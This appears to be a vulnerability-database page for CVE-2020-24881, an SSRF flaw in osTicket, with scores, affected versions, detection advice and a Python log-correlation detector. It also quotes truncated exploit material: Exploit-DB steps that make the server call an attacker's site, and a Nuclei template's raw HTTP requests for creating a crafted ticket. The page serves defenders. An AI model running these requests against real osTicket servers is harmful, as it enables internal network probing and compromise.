CVE-2020-24881
Published 2020-11-02
CVE-2020-24881: SSRF exists in osTicket before 1.14.3, where an attacker can add a malicious file to the server or perform port scanning.
Priority P275 · critical · 9.8 · CVSS 3.1
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EXPLOIT
EPSS: 73.27% (99.4th percentile)
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| osticket | osticket | < 1.14.3 | 1.14.3 |
Detection & IOCs (extracted from sources)
- url: /open.php
- url: /ajax.php/form/help-topic/{{option_value}}
- url: /tickets.php?a=print&id={{ticketid}}

- Detect SSRF exploitation attempt: monitor for POST requests to /open.php with multipart/form-data containing a crafted 'message' field, followed by a GET to /tickets.php?a=print. The print action triggers the server-side request to attacker-controlled URLs embedded in the ticket message.
- Monitor for outbound DNS/HTTP requests from the osTicket server process triggered by the print ticket action, which are indicative of SSRF payload delivery via the ticket message body.
- Alert on requests to /tickets.php with query parameter a=print, especially when the originating ticket was recently created via /open.php with an external URL in the message field.
- Vulnerability affects osTicket versions before 1.14.3 only; upgrade to 1.14.3+ to remediate.
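
The create-then-print correlation described in the bullets above, as an added detection example (not part of the original entry or of any osTicket tooling). It assumes Apache/nginx combined-format access logs, correlates by client IP, and uses a 10-minute window; the function names, the window and the sample lines are constructed for illustration. Access logs do not record the POST body, so the 'message' field itself has to be checked elsewhere, for example in WAF or application logs.

```python
import re
from datetime import datetime, timedelta
from urllib.parse import urlsplit, parse_qs

LOG_RE = re.compile(  # assumes Apache/nginx combined log format
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
WINDOW = timedelta(minutes=10)  # assumed correlation window, tune per site

def path_is(path, name):
    # osTicket may live under a sub-directory, so compare the last path segment
    return path.rstrip("/").split("/")[-1] == name

def find_create_then_print(lines, window=WINDOW):
    """Return (ip, created_at, printed_at, target) for each print that follows a ticket creation."""
    last_open = {}  # client ip -> time of most recent POST to open.php
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        url = urlsplit(m["target"])
        if m["method"] == "POST" and path_is(url.path, "open.php"):
            last_open[m["ip"]] = ts
        elif m["method"] == "GET" and path_is(url.path, "tickets.php"):
            if parse_qs(url.query).get("a") == ["print"]:
                opened = last_open.get(m["ip"])
                if opened is not None and timedelta(0) <= ts - opened <= window:
                    hits.append((m["ip"], opened, ts, m["target"]))
    return hits

# Constructed sample access-log lines (documentation IP ranges), not real traffic.
SAMPLE = [
    '198.51.100.7 - - [02/Nov/2020:10:00:01 +0000] "GET /open.php HTTP/1.1" 200 5120',
    '198.51.100.7 - - [02/Nov/2020:10:00:30 +0000] "POST /open.php HTTP/1.1" 302 0',
    '198.51.100.7 - - [02/Nov/2020:10:01:05 +0000] "GET /tickets.php?a=print&id=42 HTTP/1.1" 200 20480',
    '203.0.113.9 - - [02/Nov/2020:10:02:00 +0000] "GET /tickets.php?a=print&id=7 HTTP/1.1" 200 20480',
    '192.0.2.44 - - [02/Nov/2020:09:00:00 +0000] "POST /support/open.php HTTP/1.1" 302 0',
    '192.0.2.44 - - [02/Nov/2020:11:30:00 +0000] "GET /support/tickets.php?id=9&a=print HTTP/1.1" 200 20480',
]

if __name__ == "__main__":
    for ip, opened, printed, target in find_create_then_print(SAMPLE):
        print(f"ALERT {ip}: ticket created {opened:%H:%M:%S}, printed {printed:%H:%M:%S} -> {target}")
```

A hit is a lead for triage, not proof of exploitation: pair it with the outbound DNS/HTTP monitoring from the second bullet before escalating.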
CVSS provenance
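| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| nvd | v2.0 | 7.5 | HIGH | AV:N/AC:L/Au:N/C:P/I:P/A:P |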
No detection rules found.
Exploit-DB
osTicket 1.14.2 - SSRF
exploitdb·2021-01-19·CVSS 9.8
CVE-2020-24881 [CRITICAL] osTicket 1.14.2 - SSRF
---
# Exploit Title: osTicket 1.14.2 - SSRF
# Date: 18-01-2021
# Exploit Author: Talat Mehmood
# Vendor Homepage: https://osticket.com/
# Software Link: https://osticket.com/download/
# Version:
4. After submitting this comment, print this ticket.
5. You'll receive a hit on your malicious website from the internal server on which osTicket is deployed.
For more details, read my following blog:
https://blackbatsec.medium.com/cve-2020-24881-server-side-request-forgery-in-osticket-eea175e147f0
https://nvd.nist.gov/vuln/detail/CVE-2020-24881
Nuclei
OsTicket < 1.14.3 - Server Side Request Forgery
nuclei·CVSS 9.8
CVE-2020-24881 [CRITICAL] OsTicket < 1.14.3 - Server Side Request Forgery
OsTicket '
```yaml
        internal: true
  - raw:
      - |
        GET /open.php HTTP/1.1
        Host: {{Hostname}}
    extractors:
      - type: regex
        name: option_value
        part: body
        group: 1
        regex:
          - 'Select a Help Topic.+?[ \n]+'
        internal: true
      - type: regex
        name: csrf_token2
        part: body
        group: 1
        regex:
          - ''
        internal: true
  - raw:
      - |
        GET /ajax.php/form/help-topic/{{option_value}} HTTP/1.1
        Host: {{Hostname}}
        Referer: http://{{Hostname}}/open.php
      - |
        POST /open.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=---------------------------266856663522356381601517168829
        -----------------------------266856663522356381601517168829
        Content-Disposition: form-data; name="__CSRFToken__"
        {{csrf_token2}}
        -----------------------------266856663522356381601517168829
        Content-Disposition: form-data; name="a"
        open
        -----
```
No writeups or analysis indexed.
- http://packetstormsecurity.com/files/160995/osTicket-1.14.2-Server-Side-Request-Forgery.html
- https://blackbatsec.medium.com/cve-2020-24881-server-side-request-forgery-in-osticket-eea175e147f0
- https://github.com/osTicket/osTicket/commit/d98c2d096aeb8876c6ab2f88317cd371d781f14d
Published: 2020-11-02